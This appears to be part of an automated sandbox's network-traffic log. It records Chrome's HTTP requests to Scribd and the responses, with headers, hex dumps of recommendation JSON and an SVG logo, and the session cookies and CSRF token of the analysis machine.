                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC208INData Raw: 56 61 72 79 3a 20 58 2d 4c 61 6e 67 75 61 67 65 2d 4c 6f 63 61 6c 65 2c 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 36 33 30 37 32 30 30 30 3b 20 69 6e 63 6c 75 64 65 53 75 62 44 6f 6d 61 69 6e 73 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 37 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 0d 0a 74 72 61 6e 73 66 65 72 2d 65 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Vary: X-Language-Locale,Accept-EncodingStrict-Transport-Security: max-age=63072000; includeSubDomainsalt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC4INData Raw: 36 37 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 67
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC103INData Raw: 7b 22 63 73 72 66 5f 74 6f 6b 65 6e 22 3a 22 72 6e 38 75 6c 42 4d 4f 64 45 37 78 5f 69 69 58 67 4f 7a 2d 4d 6d 63 72 59 50 35 6f 45 63 31 34 55 61 39 2d 71 47 56 39 35 4a 4f 56 55 6f 36 39 41 51 6a 47 35 6c 62 35 57 30 62 61 36 43 42 73 4c 44 36 64 4f 4d 6b 53 59 47 78 7a 4d 4c 72 76 45 6e 55 66 7a 41 22 7d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: {"csrf_token":"rn8ulBMOdE7x_iiXgOz-MmcrYP5oEc14Ua9-qGV95JOVUo69AQjG5lb5W0ba6CBsLD6dOMkSYGxzMLrvEnUfzA"}
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC7INData Raw: 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        29192.168.2.1649749151.101.194.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:25 UTC1706OUTGET /doc-page/recommenders/801519291?recs_veils_of_discoverability=undefined&recs_embedding_reranking_docpage=undefined&recs_explore_rerank_scribd=undefined&doc_page_pmp_boosting=control HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        X-Requested-With: XMLHttpRequest
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/document/801519291/Advice-Notification
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; _fs_sample_user=false; _dd_s=rum=0&expire=1733523263684; __CJ_nwt=%7B%22nw2868%22%3A7327%7D
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC988INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: private, no-store
                                                                                                                                                                                                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                                        Etag: W/"4a4cbdc662cff6cb2b589ecd81dbe41c"
                                                                                                                                                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        Status: 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                        X-Download-Options: noopen
                                                                                                                                                                                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 342
                                                                                                                                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                                                                                                                        X-Request-Id: 157e1c4d9ceb32d10884fd641be9c2ff567595b5d8e9341ae15b6a004c46021f
                                                                                                                                                                                                                                                                                                                                                                                        X-Runtime: 0.338499
                                                                                                                                                                                                                                                                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740042-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522366.043505,VS0,VE368
                                                                                                                                                                                                                                                                                                                                                                                        Vary: X-Language-Locale,Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC6INData Raw: 33 63 34 61 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 3c4a
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC1378INData Raw: 7b 22 76 69 65 77 70 6f 72 74 5f 62 6f 74 74 6f 6d 5f 72 65 63 73 22 3a 7b 22 69 74 65 6d 73 22 3a 5b 7b 22 69 64 22 3a 33 32 32 30 31 31 33 39 31 2c 22 64 6f 63 5f 75 75 69 64 22 3a 22 73 62 64 2f 30 4e 6b 4b 37 71 6d 75 68 33 4c 71 2f 36 6c 6a 53 74 31 73 76 73 49 3d 22 7d 2c 7b 22 69 64 22 3a 33 35 37 38 31 33 30 35 34 2c 22 64 6f 63 5f 75 75 69 64 22 3a 22 73 62 64 2f 59 67 61 62 34 78 30 72 62 54 4b 43 48 55 72 54 4c 34 66 52 64 6e 55 3d 22 7d 2c 7b 22 69 64 22 3a 33 33 35 38 30 38 37 34 36 2c 22 64 6f 63 5f 75 75 69 64 22 3a 22 73 62 64 2f 69 7a 6e 4a 64 30 58 76 6f 56 4e 69 64 34 4b 32 73 65 4f 72 62 48 63 3d 22 7d 2c 7b 22 69 64 22 3a 33 31 30 35 36 30 31 30 38 2c 22 64 6f 63 5f 75 75 69 64 22 3a 22 73 62 64 2f 54 34 67 58 66 43 74 53 48 61 6c 47
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: {"viewport_bottom_recs":{"items":[{"id":322011391,"doc_uuid":"sbd/0NkK7qmuh3Lq/6ljSt1svsI="},{"id":357813054,"doc_uuid":"sbd/Ygab4x0rbTKCHUrTL4fRdnU="},{"id":335808746,"doc_uuid":"sbd/iznJd0XvoVNid4K2seOrbHc="},{"id":310560108,"doc_uuid":"sbd/T4gXfCtSHalG
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC1378INData Raw: 66 6b 43 77 4d 4c 36 48 73 3d 22 7d 2c 7b 22 69 64 22 3a 31 36 33 36 34 36 30 35 34 2c 22 64 6f 63 5f 75 75 69 64 22 3a 22 73 62 64 2f 65 32 58 59 50 37 32 76 44 4f 70 68 67 57 63 76 57 46 4e 45 37 63 45 3d 22 7d 2c 7b 22 69 64 22 3a 33 33 37 35 33 36 30 36 31 2c 22 64 6f 63 5f 75 75 69 64 22 3a 22 73 62 64 2f 45 6f 70 66 66 6e 2f 63 50 34 79 4f 69 57 4b 6d 4f 4c 75 71 6f 59 4d 3d 22 7d 2c 7b 22 69 64 22 3a 32 34 34 31 35 37 39 31 37 2c 22 64 6f 63 5f 75 75 69 64 22 3a 22 73 62 64 2f 6b 33 33 6a 49 35 7a 49 64 41 53 77 39 46 5a 33 6d 6e 43 45 6c 39 77 3d 22 7d 2c 7b 22 69 64 22 3a 31 36 33 35 37 39 30 35 36 2c 22 64 6f 63 5f 75 75 69 64 22 3a 22 73 62 64 2f 59 72 53 47 4d 42 69 54 41 78 2f 37 37 79 67 31 32 54 35 64 30 68 59 3d 22 7d 2c 7b 22 69 64 22 3a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: fkCwML6Hs="},{"id":163646054,"doc_uuid":"sbd/e2XYP72vDOphgWcvWFNE7cE="},{"id":337536061,"doc_uuid":"sbd/Eopffn/cP4yOiWKmOLuqoYM="},{"id":244157917,"doc_uuid":"sbd/k33jI5zIdASw9FZ3mnCEl9w="},{"id":163579056,"doc_uuid":"sbd/YrSGMBiTAx/77yg12T5d0hY="},{"id":
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC1378INData Raw: 31 32 33 32 2c 32 32 35 39 31 36 34 38 36 2c 31 38 32 35 36 30 32 38 33 2c 33 38 37 38 32 36 39 38 35 2c 34 32 33 33 38 37 34 36 32 2c 32 33 39 35 38 38 34 37 34 2c 32 32 34 34 31 39 30 32 33 2c 33 35 39 34 35 37 33 34 38 2c 32 32 34 34 32 30 30 30 38 2c 32 31 32 38 36 33 37 33 38 2c 32 32 34 33 30 36 36 31 39 2c 32 32 34 37 35 36 37 30 36 5d 2c 22 74 69 74 6c 65 5f 6c 69 6e 6b 22 3a 6e 75 6c 6c 2c 22 74 69 74 6c 65 22 3a 6e 75 6c 6c 2c 22 74 72 61 63 6b 5f 6f 70 74 73 22 3a 7b 22 63 6f 6d 70 69 6c 61 74 69 6f 6e 5f 69 64 22 3a 22 73 62 64 2f 45 34 43 4b 30 78 63 55 4a 7a 55 64 46 45 52 55 75 66 4c 4c 68 64 6f 3d 22 2c 22 6d 6f 64 75 6c 65 5f 69 64 22 3a 22 73 62 64 2f 64 68 57 66 32 49 77 73 72 58 44 4b 78 5a 4b 35 71 66 38 69 75 58 6b 3d 22 2c 22 77 69
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 1232,225916486,182560283,387826985,423387462,239588474,224419023,359457348,224420008,212863738,224306619,224756706],"title_link":null,"title":null,"track_opts":{"compilation_id":"sbd/E4CK0xcUJzUdFERUufLLhdo=","module_id":"sbd/dhWf2IwsrXDKxZK5qf8iuXk=","wi
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC1378INData Raw: 4a 6b 77 62 44 72 78 6d 79 37 5a 42 6f 58 51 45 59 4e 33 30 6f 3d 22 7d 2c 7b 22 69 64 22 3a 32 32 34 32 35 32 31 37 38 2c 22 64 6f 63 5f 75 75 69 64 22 3a 22 73 62 64 2f 55 4f 6d 37 4c 33 74 68 52 37 59 64 66 36 51 34 75 6a 70 2f 64 36 59 3d 22 7d 2c 7b 22 69 64 22 3a 33 33 35 35 33 37 33 39 38 2c 22 64 6f 63 5f 75 75 69 64 22 3a 22 73 62 64 2f 47 5a 6d 70 39 46 4e 4c 72 6f 56 53 51 47 54 57 72 31 6a 59 42 36 6f 3d 22 7d 2c 7b 22 69 64 22 3a 31 38 32 35 35 33 31 34 31 2c 22 64 6f 63 5f 75 75 69 64 22 3a 22 73 62 64 2f 4a 66 69 57 39 5a 75 7a 5a 38 51 50 6f 68 65 70 55 74 39 6b 62 32 30 3d 22 7d 2c 7b 22 69 64 22 3a 32 33 35 34 31 31 37 36 37 2c 22 64 6f 63 5f 75 75 69 64 22 3a 22 73 62 64 2f 44 4d 65 44 42 70 55 46 4a 36 6a 52 68 65 32 47 32 33 6a 49 73
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: JkwbDrxmy7ZBoXQEYN30o="},{"id":224252178,"doc_uuid":"sbd/UOm7L3thR7Ydf6Q4ujp/d6Y="},{"id":335537398,"doc_uuid":"sbd/GZmp9FNLroVSQGTWr1jYB6o="},{"id":182553141,"doc_uuid":"sbd/JfiW9ZuzZ8QPohepUt9kb20="},{"id":235411767,"doc_uuid":"sbd/DMeDBpUFJ6jRhe2G23jIs
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC1378INData Raw: 3d 22 7d 5d 2c 22 69 64 73 22 3a 5b 33 32 32 30 31 31 33 39 31 2c 33 35 37 38 31 33 30 35 34 2c 33 33 35 38 30 38 37 34 36 2c 33 31 30 35 36 30 31 30 38 2c 32 32 34 34 31 30 34 30 36 2c 33 35 36 30 33 32 31 35 31 2c 33 32 32 30 31 31 33 39 32 2c 33 30 38 30 33 30 37 35 37 2c 33 30 39 38 35 39 38 33 35 2c 32 32 34 32 36 36 36 33 33 2c 32 31 31 33 30 32 37 35 35 2c 32 36 33 35 30 34 32 31 38 2c 33 39 33 33 39 33 37 38 39 2c 32 33 34 30 32 38 35 30 33 2c 32 32 34 33 36 39 38 30 36 2c 32 32 34 33 32 36 32 35 30 2c 33 37 38 30 34 35 37 38 33 2c 32 32 34 34 32 36 38 37 37 2c 32 32 34 32 35 32 31 37 38 2c 33 33 35 35 33 37 33 39 38 2c 31 38 32 35 35 33 31 34 31 2c 32 33 35 34 31 31 37 36 37 2c 34 31 39 39 33 30 35 34 31 2c 31 36 33 36 34 36 30 35 34 2c 33 33 37
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ="}],"ids":[322011391,357813054,335808746,310560108,224410406,356032151,322011392,308030757,309859835,224266633,211302755,263504218,393393789,234028503,224369806,224326250,378045783,224426877,224252178,335537398,182553141,235411767,419930541,163646054,337
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC1378INData Raw: 6b 22 2c 22 73 74 61 74 69 63 5f 72 61 74 69 6e 67 22 3a 7b 22 72 61 74 69 6e 67 22 3a 34 2e 30 2c 22 63 6f 75 6e 74 22 3a 35 39 34 33 2c 22 75 70 5f 63 6f 75 6e 74 22 3a 34 31 39 31 7d 2c 22 74 68 75 6d 62 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 69 6d 67 76 32 2d 31 2d 66 2e 73 63 72 69 62 64 61 73 73 65 74 73 2e 63 6f 6d 2f 69 6d 67 2f 77 6f 72 64 5f 64 6f 63 75 6d 65 6e 74 2f 33 32 32 30 31 31 33 39 31 2f 31 34 39 78 31 39 38 2f 31 34 62 62 61 66 39 38 64 35 2f 31 37 33 33 33 34 34 34 37 35 3f 76 3d 31 22 2c 22 74 69 74 6c 65 22 3a 22 54 68 65 20 53 75 62 74 6c 65 20 41 72 74 20 6f 66 20 4e 6f 74 20 47 69 76 69 6e 67 20 61 20 46 2a 63 6b 3a 20 41 20 43 6f 75 6e 74 65 72 69 6e 74 75 69 74 69 76 65 20 41 70 70 72 6f 61 63 68 20 74 6f 20 4c 69 76 69
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: k","static_rating":{"rating":4.0,"count":5943,"up_count":4191},"thumb_url":"https://imgv2-1-f.scribdassets.com/img/word_document/322011391/149x198/14bbaf98d5/1733344475?v=1","title":"The Subtle Art of Not Giving a F*ck: A Counterintuitive Approach to Livi
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC1378INData Raw: 3a 22 62 6f 6f 6b 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 65 76 65 72 61 6e 64 2e 63 6f 6d 2f 62 6f 6f 6b 2f 33 35 37 38 31 33 30 35 34 2f 50 72 69 6e 63 69 70 6c 65 73 2d 4c 69 66 65 2d 61 6e 64 2d 57 6f 72 6b 22 2c 22 76 69 65 77 73 22 3a 22 31 2e 31 4d 22 7d 2c 22 33 33 35 38 30 38 37 34 36 22 3a 7b 22 61 75 74 68 6f 72 22 3a 22 42 72 65 6e c3 a9 20 42 72 6f 77 6e 22 2c 22 61 75 74 68 6f 72 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 65 76 65 72 61 6e 64 2e 63 6f 6d 2f 61 75 74 68 6f 72 2f 37 30 34 31 33 30 36 32 33 2f 42 72 65 6e 65 2d 42 72 6f 77 6e 22 2c 22 63 61 74 65 67 6f 72 69 65 73 22 3a 5b 5d 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 45 57 20 59 4f 52 4b 20 54 49 4d 45 53 c2 a0 42 45 53 54 53 45 4c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: :"book","url":"https://www.everand.com/book/357813054/Principles-Life-and-Work","views":"1.1M"},"335808746":{"author":"Bren Brown","author_url":"https://www.everand.com/author/704130623/Brene-Brown","categories":[],"description":"NEW YORK TIMESBESTSEL
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC1378INData Raw: 73 3a 2f 2f 77 77 77 2e 65 76 65 72 61 6e 64 2e 63 6f 6d 2f 61 75 74 68 6f 72 2f 36 35 35 38 35 35 32 39 30 2f 43 68 72 69 73 2d 56 6f 73 73 22 2c 22 63 61 74 65 67 6f 72 69 65 73 22 3a 5b 5d 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 68 69 73 20 69 6e 74 65 72 6e 61 74 69 6f 6e 61 6c 20 62 65 73 74 73 65 6c 6c 65 72 2c 20 77 69 74 68 20 6d 6f 72 65 20 74 68 61 6e 20 33 20 6d 69 6c 6c 69 6f 6e 20 63 6f 70 69 65 73 20 73 6f 6c 64 2c 20 6f 66 66 65 72 73 20 61 20 66 69 65 6c 64 2d 74 65 73 74 65 64 20 61 70 70 72 6f 61 63 68 20 74 6f 20 68 69 67 68 2d 73 74 61 6b 65 73 20 6e 65 67 6f 74 69 61 74 69 6f 6e 73 e2 80 94 77 68 65 74 68 65 72 20 69 6e 20 74 68 65 20 62 6f 61 72 64 72 6f 6f 6d 2c 20 69 6e 20 79 6f 75 72 20 63 6f 6d 6d 75 6e 69 74 79 2c 20
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: s://www.everand.com/author/655855290/Chris-Voss","categories":[],"description":"This international bestseller, with more than 3 million copies sold, offers a field-tested approach to high-stakes negotiationswhether in the boardroom, in your community,
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC1378INData Raw: 20 73 68 6f 72 74 20 6f 66 20 73 70 65 63 74 61 63 75 6c 61 72 e2 80 9d 20 28 45 6e 74 65 72 74 61 69 6e 6d 65 6e 74 20 57 65 65 6b 6c 79 29 20 6d 65 6d 6f 69 72 20 66 72 6f 6d 20 6f 6e 65 20 6f 66 20 74 68 65 20 77 6f 72 6c 64 e2 80 99 73 20 6d 6f 73 74 20 67 69 66 74 65 64 20 73 74 6f 72 79 74 65 6c 6c 65 72 73 2e 20 5c 6e 5c 6e 54 68 65 20 47 6c 61 73 73 20 43 61 73 74 6c 65 20 69 73 20 61 20 72 65 6d 61 72 6b 61 62 6c 65 20 6d 65 6d 6f 69 72 20 6f 66 20 72 65 73 69 6c 69 65 6e 63 65 20 61 6e 64 20 72 65 64 65 6d 70 74 69 6f 6e 2c 20 61 6e 64 20 61 20 72 65 76 65 6c 61 22 2c 22 69 64 22 3a 32 32 34 34 31 30 34 30 36 2c 22 69 73 5f 73 65 72 69 65 73 22 3a 66 61 6c 73 65 2c 22 69 6e 5f 6c 69 62 72 61 72 79 22 3a 66 61 6c 73 65 2c 22 6c 69 62 72 61 72 79
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: short of spectacular (Entertainment Weekly) memoir from one of the worlds most gifted storytellers. \n\nThe Glass Castle is a remarkable memoir of resilience and redemption, and a revela","id":224410406,"is_series":false,"in_library":false,"library


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        30192.168.2.1649751151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC618OUTGET /images/scribd_logo_horiz_small_slate.svg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: s-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC507INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 6439
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Fri, 06 Dec 2024 19:31:18 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "40faa3e08deec82c2c290889a4691cb5"
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 0
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740078-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522366.278269,VS0,VE143
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC1378INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 20 73 74 61 6e 64 61 6c 6f 6e 65 3d 22 6e 6f 22 3f 3e 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 32 35 70 78 22 20 68 65 69 67 68 74 3d 22 35 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 32 35 20 35 30 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 65 6e 65 72 61 74 6f 72 3a 20 53 6b 65 74 63 68 20 34 33 2e 32 20 28 33 39 30 36 39 29 20 2d 20 68 74 74 70 3a 2f 2f 77 77 77 2e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8" standalone="no"?><svg width="225px" height="50px" viewBox="0 0 225 50" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> ... Generator: Sketch 43.2 (39069) - http://www.
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:26 UTC1378INData Raw: 34 36 39 34 38 33 20 36 36 2e 39 39 30 33 33 31 35 2c 31 38 2e 32 34 38 33 32 39 35 20 5a 20 4d 31 31 33 2e 39 35 30 38 36 38 2c 33 33 2e 36 38 37 35 35 36 31 20 4c 31 31 32 2e 30 31 31 36 34 32 2c 33 31 2e 37 38 35 36 32 32 34 20 43 31 30 39 2e 35 31 33 30 32 33 2c 33 34 2e 31 37 32 33 36 32 37 20 31 30 37 2e 31 36 33 35 37 35 2c 33 35 2e 35 35 32 31 39 37 20 31 30 33 2e 35 38 33 34 36 35 2c 33 35 2e 35 35 32 31 39 37 20 43 39 37 2e 38 34 30 33 37 31 2c 33 35 2e 35 35 32 31 39 37 20 39 33 2e 34 37 37 31 31 31 33 2c 33 30 2e 38 31 36 30 30 39 31 20 39 33 2e 34 37 37 31 31 31 33 2c 32 34 2e 37 33 37 32 37 39 38 20 43 39 33 2e 34 37 37 31 31 31 33 2c 31 38 2e 36 35 38 35 35 30 35 20 39 37 2e 38 30 33 30 37 38 31 2c 31 33 2e 39 39 36 39 34 38 33 20 31 30 33
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 469483 66.9903315,18.2483295 Z M113.950868,33.6875561 L112.011642,31.7856224 C109.513023,34.1723627 107.163575,35.552197 103.583465,35.552197 C97.840371,35.552197 93.4771113,30.8160091 93.4771113,24.7372798 C93.4771113,18.6585505 97.8030781,13.9969483 103
